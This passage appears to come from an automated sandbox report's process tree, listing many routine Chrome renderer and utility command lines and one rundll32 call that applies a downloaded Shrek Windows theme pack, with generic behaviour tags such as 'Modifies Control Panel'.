  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=10704,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10728 /prefetch:1
  2⤵
  PID:6576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=10852,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10884 /prefetch:1
  2⤵
  PID:6584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=11008,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=11032 /prefetch:1
  2⤵
  PID:6592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=11172,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=11196 /prefetch:1
  2⤵
  PID:6600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=11340,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=11356 /prefetch:1
  2⤵
  PID:6608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=11488,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=11528 /prefetch:1
  2⤵
  PID:6620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=11500,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=11572 /prefetch:1
  2⤵
  PID:6628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=11556,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=11612 /prefetch:1
  2⤵
  PID:6636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=11960,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=11952 /prefetch:1
  2⤵
  PID:6644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=11968,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=11988 /prefetch:1
  2⤵
  PID:6652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=12256,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=12280 /prefetch:1
  2⤵
  PID:6660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=12428,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=12440 /prefetch:1
  2⤵
  PID:6668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=12584,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=12596 /prefetch:1
  2⤵
  PID:6676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=12724,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=12752 /prefetch:1
  2⤵
  PID:6684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --field-trial-handle=12892,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=12908 /prefetch:1
  2⤵
  PID:6692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --field-trial-handle=12900,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=13080 /prefetch:1
  2⤵
  PID:6700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=13204,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=13232 /prefetch:1
  2⤵
  PID:6708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --field-trial-handle=11336,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=13184 /prefetch:1
  2⤵
  PID:7468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --field-trial-handle=11536,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=7568 /prefetch:1
  2⤵
  PID:7640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=12884,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=12928 /prefetch:1
  2⤵
  PID:7752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=12192,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=12960 /prefetch:1
  2⤵
  PID:7760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --field-trial-handle=11504,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=11928 /prefetch:1
  2⤵
  PID:7864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --field-trial-handle=10740,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10156 /prefetch:1
  2⤵
  PID:7872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --field-trial-handle=10296,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10144 /prefetch:1
  2⤵
  PID:7976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --field-trial-handle=10288,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10364 /prefetch:1
  2⤵
  PID:7984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --field-trial-handle=10568,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=13384 /prefetch:1
  2⤵
  PID:8092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --field-trial-handle=13536,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=13472 /prefetch:1
  2⤵
  PID:8148
- C:\Windows\system32\rundll32.exe
  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\themecpl.dll,OpenThemeAction C:\Users\Admin\Downloads\shrek-forever-after-windows-seven-theme-.themepack
  2⤵
  - Modifies Control Panel
  PID:7580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=5688,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6588 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --field-trial-handle=5560,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6020 /prefetch:1
  2⤵
  PID:2020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3100,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6476 /prefetch:8
  2⤵
  PID:8456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --field-trial-handle=9252,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5420 /prefetch:1
  2⤵
  PID:3148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --field-trial-handle=13064,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10668 /prefetch:1
  2⤵
  PID:884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --field-trial-handle=1376,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10412 /prefetch:1
  2⤵
  PID:8248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --field-trial-handle=6992,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6476 /prefetch:1
  2⤵
  PID:9800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --field-trial-handle=8976,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:6880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --field-trial-handle=8952,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=13120 /prefetch:1
  2⤵
  PID:9624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --field-trial-handle=6968,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=7048 /prefetch:1
  2⤵
  PID:9596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --field-trial-handle=7020,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10320 /prefetch:1
  2⤵
  PID:9784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --field-trial-handle=12136,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10772 /prefetch:1
  2⤵
  PID:4428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --field-trial-handle=8876,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=9220 /prefetch:1
  2⤵
  PID:9304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --field-trial-handle=12220,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=9156 /prefetch:1
  2⤵
  PID:9284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --field-trial-handle=11884,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=12196 /prefetch:1
  2⤵
  PID:9280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --field-trial-handle=11964,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=7528 /prefetch:1
  2⤵
  PID:9060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --field-trial-handle=3160,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=7500 /prefetch:1
  2⤵
  PID:8904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --field-trial-handle=5076,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5092 /prefetch:1
  2⤵
  PID:8644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --field-trial-handle=13004,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10120 /prefetch:1
  2⤵
  PID:8428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --field-trial-handle=9200,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=7612 /prefetch:1
  2⤵
  PID:4012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=10104,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=9724 /prefetch:8
  2⤵
  PID:7716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --field-trial-handle=9524,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2544 /prefetch:1
  2⤵
  PID:10072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --field-trial-handle=8672,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=11588 /prefetch:1
  2⤵
  PID:8256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --field-trial-handle=10248,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10148 /prefetch:1
  2⤵
  PID:9116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --field-trial-handle=13576,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=9516 /prefetch:1
  2⤵
  PID:8884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --field-trial-handle=13628,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6956 /prefetch:1
  2⤵
  PID:9956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --field-trial-handle=13652,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6976 /prefetch:1
  2⤵
  PID:9928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=9324,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=13812 /prefetch:8
  2⤵
  PID:9532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=10404,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10396 /prefetch:8
  2⤵
  - Modifies registry class
  PID:2476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --field-trial-handle=13588,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=9740 /prefetch:1
  2⤵
  PID:8080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --field-trial-handle=9680,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=7012 /prefetch:1
  2⤵
  PID:1348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --field-trial-handle=8844,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3232 /prefetch:1
  2⤵
  PID:9788
- C:\Program Files\Google\Chrome\Application\chrome.exe
